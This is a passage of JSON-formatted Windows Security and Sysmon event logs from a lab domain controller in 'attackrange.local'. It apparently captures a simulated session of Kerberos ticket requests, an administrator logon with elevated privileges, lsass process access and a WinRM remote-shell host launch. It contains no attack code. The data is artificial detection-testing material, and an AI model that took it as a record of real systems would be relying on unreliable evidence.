{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220537,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x79FC3\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x79fc3","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4813,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.158\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.158","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220538,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220539,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{40EAEECF-64DC-C99D-2812-C18FD1E8F572}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{40EAEECF-64DC-C99D-2812-C18FD1E8F572}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220540,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{40EAEECF-64DC-C99D-2812-C18FD1E8F572}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{40EAEECF-64DC-C99D-2812-C18FD1E8F572}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220541,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7A117\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{40EAEECF-64DC-C99D-2812-C18FD1E8F572}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7a117","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{40EAEECF-64DC-C99D-2812-C18FD1E8F572}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220542,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7A117\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7a117","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4814,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.158\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.158","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4815,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.158\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.158","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4816,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.163\r\nProcessGuid: {41C8662E-20CD-5F25-0000-001047A10700}\r\nProcessId: 1592\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CD-5F25-0000-002017A10700}\r\nLogonId: 0x7A117\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.163","ProcessGuid":"{41C8662E-20CD-5F25-0000-001047A10700}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CD-5F25-0000-002017A10700}","LogonId":"0x7a117","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{41C8662E-1F63-5F25-0000-0010C3650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4817,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-00108C7D0600}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 